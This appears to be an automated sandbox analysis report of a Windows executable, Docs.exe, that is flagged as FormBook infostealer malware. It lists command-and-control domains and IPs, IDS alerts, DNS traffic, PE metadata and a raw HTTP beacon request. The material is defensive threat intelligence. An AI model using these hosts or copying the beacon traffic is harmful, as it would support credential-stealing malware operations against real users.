https://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM | tzutil.exe, 00000007.00000002.3290025914.0000000004768000.00000004.10000000.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.00000000034A8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
161.97.142.144 | www.070001325.xyz | United States | 51167 | CONTABODE | true
18.139.62.226 | dns.ladipage.com | United States | 16509 | AMAZON-02US | false
107.155.56.30 | www.expancz.top | United States | 135377 | UHGL-AS-APUCloudHKHoldingsGroupLimitedHK | true
General Information
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1564721
Start date and time: 2024-11-28 18:27:38 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Docs.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@6/3
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 106
• Number of non-executed functions: 299
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target hrhhgLQrQIpiVv.exe, PID 1856 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• VT rate limit hit for: Docs.exe
Time | Type | Description
12:28:27 | API Interceptor | 2x Sleep call for process: Docs.exe modified
12:29:59 | API Interceptor | 256935x Sleep call for process: tzutil.exe modified
Process: C:\Users\user\Desktop\Docs.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Windows\SysWOW64\tzutil.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
Preview: SQLite format 3......@ .......Y...........6... (remainder of the preview is non-printable bytes rendered as dots)
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.808815075532386
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: Docs.exe
File size: 799'232 bytes
MD5: db3260038649d2048d4d203b210c42ad
SHA1: 5057a1fd64ddcf3ecc104558972db366a062f6ca
SHA256: a0d68da288f42150fd44bda2ead2c51e139e25b518a932e8071818af802107b3
SHA512: 230914c5e5fa7dbd91fd1727faa20b1b4078ea9f9c0b3db81476f6395f549619cafff4ae18186809d2d13d32665d6130705bfd867c41239aeccb20ea83dd8378
SSDEEP: 24576:D/bVylX8rJ03tctF4puBKgQqhF2So/e01zGUxjP:ly0mctF4kzxo/RLJ
TLSH: 8A0512841966E902C9E28B740572D2F417794D9DEE12C303DFEA7DFF7A3E20935802A4
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.................0..(...........F... ...`....@.. ....................................@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x4c46de
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x8293E54F [Fri Jun 3 16:16:15 2039 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
Name                                   Virtual Address   Virtual Size   Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0               0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0xc468a           0x4f           .text
IMAGE_DIRECTORY_ENTRY_RESOURCE         0xc6000           0x59c          .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0               0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0               0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0xc8000           0xc            .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG            0xc33ec           0x70           .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0               0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0               0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0               0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0               0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x2000            0x8            .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x2008            0x48           .text
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0               0x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xc26e40xc280087586870fb5ee9ce7f353107f8bf8879False0.9318226321497429data7.815105086784425IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xc60000x59c0x600b24eefb6564db19594533a5b7600c3a7False0.41796875data4.059896828267816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xc80000xc0x2005ed466cf89e34bf6bd8157db8d13b283False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0xc60900x30cdata0.4371794871794872
                                                            RT_MANIFEST0xc63ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                            DLLImport
                                                            mscoree.dll_CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-28T18:29:39.701273+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49735 | 161.97.142.144 | 80 | TCP
2024-11-28T18:29:39.701273+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49735 | 161.97.142.144 | 80 | TCP
2024-11-28T18:29:57.349629+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49736 | 107.155.56.30 | 80 | TCP
2024-11-28T18:30:00.021193+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49737 | 107.155.56.30 | 80 | TCP
2024-11-28T18:30:02.697212+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49738 | 107.155.56.30 | 80 | TCP
2024-11-28T18:30:05.449809+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49739 | 107.155.56.30 | 80 | TCP
2024-11-28T18:30:05.449809+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49739 | 107.155.56.30 | 80 | TCP
2024-11-28T18:30:13.333737+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49740 | 18.139.62.226 | 80 | TCP
2024-11-28T18:30:15.990010+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49741 | 18.139.62.226 | 80 | TCP
2024-11-28T18:30:18.646422+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49742 | 18.139.62.226 | 80 | TCP
2024-11-28T18:30:21.433517+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49743 | 18.139.62.226 | 80 | TCP
2024-11-28T18:30:21.433517+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49743 | 18.139.62.226 | 80 | TCP
2024-11-28T18:30:37.089228+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49744 | 209.74.77.107 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2024 18:29:38.277731895 CET | 49735 | 80 | 192.168.2.5 | 161.97.142.144
Nov 28, 2024 18:29:38.404086113 CET | 80 | 49735 | 161.97.142.144 | 192.168.2.5
Nov 28, 2024 18:29:38.404247046 CET | 49735 | 80 | 192.168.2.5 | 161.97.142.144
Nov 28, 2024 18:29:38.413759947 CET | 49735 | 80 | 192.168.2.5 | 161.97.142.144
Nov 28, 2024 18:29:38.540617943 CET | 80 | 49735 | 161.97.142.144 | 192.168.2.5
Nov 28, 2024 18:29:39.701018095 CET | 80 | 49735 | 161.97.142.144 | 192.168.2.5
Nov 28, 2024 18:29:39.701050997 CET | 80 | 49735 | 161.97.142.144 | 192.168.2.5
Nov 28, 2024 18:29:39.701066971 CET | 80 | 49735 | 161.97.142.144 | 192.168.2.5
Nov 28, 2024 18:29:39.701081991 CET | 80 | 49735 | 161.97.142.144 | 192.168.2.5
Nov 28, 2024 18:29:39.701272964 CET | 49735 | 80 | 192.168.2.5 | 161.97.142.144
Nov 28, 2024 18:29:39.701350927 CET | 49735 | 80 | 192.168.2.5 | 161.97.142.144
Nov 28, 2024 18:29:39.706933022 CET | 49735 | 80 | 192.168.2.5 | 161.97.142.144
Nov 28, 2024 18:29:39.828720093 CET | 80 | 49735 | 161.97.142.144 | 192.168.2.5
Nov 28, 2024 18:29:55.671720982 CET | 49736 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:29:55.827507973 CET | 80 | 49736 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:29:55.827666044 CET | 49736 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:29:55.840604067 CET | 49736 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:29:55.967154026 CET | 80 | 49736 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:29:57.349628925 CET | 49736 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:29:57.458861113 CET | 80 | 49736 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:29:57.458914995 CET | 80 | 49736 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:29:57.458977938 CET | 49736 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:29:57.459017038 CET | 49736 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:29:57.472609997 CET | 80 | 49736 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:29:57.472697973 CET | 49736 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:29:58.368007898 CET | 49737 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:29:58.492079020 CET | 80 | 49737 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:29:58.492218971 CET | 49737 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:29:58.506473064 CET | 49737 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:29:58.630249023 CET | 80 | 49737 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:00.021193027 CET | 49737 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:00.100807905 CET | 80 | 49737 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:00.100832939 CET | 80 | 49737 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:00.100913048 CET | 49737 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:00.100951910 CET | 49737 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:00.148152113 CET | 80 | 49737 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:00.148226023 CET | 49737 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:01.039685011 CET | 49738 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:01.163891077 CET | 80 | 49738 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:01.164040089 CET | 49738 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:01.178642035 CET | 49738 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:01.298799992 CET | 80 | 49738 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:01.298852921 CET | 80 | 49738 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:02.697211981 CET | 49738 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:02.771729946 CET | 80 | 49738 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:02.771806955 CET | 80 | 49738 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:02.771842003 CET | 49738 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:02.771914005 CET | 49738 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:02.817621946 CET | 80 | 49738 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:02.817857981 CET | 49738 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:03.711899042 CET | 49739 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:03.834223986 CET | 80 | 49739 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:03.834314108 CET | 49739 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:03.843334913 CET | 49739 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:03.963784933 CET | 80 | 49739 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:05.449661016 CET | 80 | 49739 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:05.449680090 CET | 80 | 49739 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:05.449693918 CET | 80 | 49739 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:05.449748039 CET | 80 | 49739 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:05.449759960 CET | 80 | 49739 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:05.449773073 CET | 80 | 49739 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:05.449784040 CET | 80 | 49739 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:05.449809074 CET | 49739 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:05.449853897 CET | 49739 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:05.449987888 CET | 80 | 49739 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:05.450000048 CET | 80 | 49739 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:05.450023890 CET | 49739 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:05.450035095 CET | 80 | 49739 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:05.450072050 CET | 49739 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:05.473499060 CET | 49739 | 80 | 192.168.2.5 | 107.155.56.30
Nov 28, 2024 18:30:05.594368935 CET | 80 | 49739 | 107.155.56.30 | 192.168.2.5
Nov 28, 2024 18:30:11.683485985 CET | 49740 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:11.803688049 CET | 80 | 49740 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:11.803786039 CET | 49740 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:11.819669008 CET | 49740 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:11.939846992 CET | 80 | 49740 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:13.333736897 CET | 49740 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:13.426341057 CET | 80 | 49740 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:13.426383972 CET | 80 | 49740 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:13.426428080 CET | 49740 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:13.426536083 CET | 49740 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:13.454468012 CET | 80 | 49740 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:13.454675913 CET | 49740 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:14.352382898 CET | 49741 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:14.474153996 CET | 80 | 49741 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:14.474370003 CET | 49741 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:14.488987923 CET | 49741 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:14.609414101 CET | 80 | 49741 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:15.990010023 CET | 49741 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:16.070369959 CET | 80 | 49741 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:16.070461035 CET | 80 | 49741 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:16.070519924 CET | 49741 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:16.070573092 CET | 49741 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:16.110522985 CET | 80 | 49741 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:16.110657930 CET | 49741 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:17.008981943 CET | 49742 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:17.129132986 CET | 80 | 49742 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:17.129295111 CET | 49742 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:17.143877029 CET | 49742 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:17.268465996 CET | 80 | 49742 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:17.268522024 CET | 80 | 49742 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:18.646421909 CET | 49742 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:18.727408886 CET | 80 | 49742 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:18.727494955 CET | 49742 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:18.766980886 CET | 80 | 49742 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:18.767043114 CET | 49742 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:19.665090084 CET | 49743 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:19.785206079 CET | 80 | 49743 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:19.785470009 CET | 49743 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:19.794307947 CET | 49743 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:19.914560080 CET | 80 | 49743 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:21.433264971 CET | 80 | 49743 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:21.433461905 CET | 80 | 49743 | 18.139.62.226 | 192.168.2.5
Nov 28, 2024 18:30:21.433516979 CET | 49743 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:21.436032057 CET | 49743 | 80 | 192.168.2.5 | 18.139.62.226
Nov 28, 2024 18:30:21.556243896 CET | 80 | 49743 | 18.139.62.226 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2024 18:29:37.657362938 CET | 61393 | 53 | 192.168.2.5 | 1.1.1.1
Nov 28, 2024 18:29:38.271363974 CET | 53 | 61393 | 1.1.1.1 | 192.168.2.5
Nov 28, 2024 18:29:54.743236065 CET | 55711 | 53 | 192.168.2.5 | 1.1.1.1
Nov 28, 2024 18:29:55.669398069 CET | 53 | 55711 | 1.1.1.1 | 192.168.2.5
Nov 28, 2024 18:30:10.479465008 CET | 51083 | 53 | 192.168.2.5 | 1.1.1.1
Nov 28, 2024 18:30:11.474409103 CET | 51083 | 53 | 192.168.2.5 | 1.1.1.1
Nov 28, 2024 18:30:11.680951118 CET | 53 | 51083 | 1.1.1.1 | 192.168.2.5
Nov 28, 2024 18:30:11.681051016 CET | 53 | 51083 | 1.1.1.1 | 192.168.2.5
Nov 28, 2024 18:30:26.446403980 CET | 50325 | 53 | 192.168.2.5 | 1.1.1.1
Nov 28, 2024 18:30:26.676800966 CET | 53 | 50325 | 1.1.1.1 | 192.168.2.5
Nov 28, 2024 18:30:35.133902073 CET | 60019 | 53 | 192.168.2.5 | 1.1.1.1
Nov 28, 2024 18:30:35.633138895 CET | 53 | 60019 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 28, 2024 18:29:37.657362938 CET | 192.168.2.5 | 1.1.1.1 | 0x7200 | Standard query (0) | www.070001325.xyz | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:29:54.743236065 CET | 192.168.2.5 | 1.1.1.1 | 0x101c | Standard query (0) | www.expancz.top | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:30:10.479465008 CET | 192.168.2.5 | 1.1.1.1 | 0xa39c | Standard query (0) | www.taxiquynhonnew.click | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:30:11.474409103 CET | 192.168.2.5 | 1.1.1.1 | 0xa39c | Standard query (0) | www.taxiquynhonnew.click | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:30:26.446403980 CET | 192.168.2.5 | 1.1.1.1 | 0x2b54 | Standard query (0) | www.epitomize.shop | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:30:35.133902073 CET | 192.168.2.5 | 1.1.1.1 | 0x2429 | Standard query (0) | www.learnwithus.site | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 28, 2024 18:29:38.271363974 CET | 1.1.1.1 | 192.168.2.5 | 0x7200 | No error (0) | www.070001325.xyz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:29:55.669398069 CET | 1.1.1.1 | 192.168.2.5 | 0x101c | No error (0) | www.expancz.top | | 107.155.56.30 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:30:11.680951118 CET | 1.1.1.1 | 192.168.2.5 | 0xa39c | No error (0) | www.taxiquynhonnew.click | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 28, 2024 18:30:11.680951118 CET | 1.1.1.1 | 192.168.2.5 | 0xa39c | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:30:11.680951118 CET | 1.1.1.1 | 192.168.2.5 | 0xa39c | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:30:11.680951118 CET | 1.1.1.1 | 192.168.2.5 | 0xa39c | No error (0) | dns.ladipage.com | | 54.179.173.60 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:30:11.681051016 CET | 1.1.1.1 | 192.168.2.5 | 0xa39c | No error (0) | www.taxiquynhonnew.click | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 28, 2024 18:30:11.681051016 CET | 1.1.1.1 | 192.168.2.5 | 0xa39c | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:30:11.681051016 CET | 1.1.1.1 | 192.168.2.5 | 0xa39c | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:30:11.681051016 CET | 1.1.1.1 | 192.168.2.5 | 0xa39c | No error (0) | dns.ladipage.com | | 54.179.173.60 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:30:26.676800966 CET | 1.1.1.1 | 192.168.2.5 | 0x2b54 | Name error (3) | www.epitomize.shop | none | none | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:30:35.633138895 CET | 1.1.1.1 | 192.168.2.5 | 0x2429 | No error (0) | www.learnwithus.site | | 209.74.77.107 | A (IP address) | IN (0x0001) | false

• www.070001325.xyz
• www.expancz.top
• www.taxiquynhonnew.click
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49735 | 161.97.142.144 | 80 | 1268 | C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:29:38.413759947 CET | 551 | OUT | GET /gebt/?rvEtL=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edh05neJJauEoNaZQG1y+cvjoSHU7S86EKf7lUg55fOkggqQ==&mFTD=mPHXHp HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.070001325.xyz
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
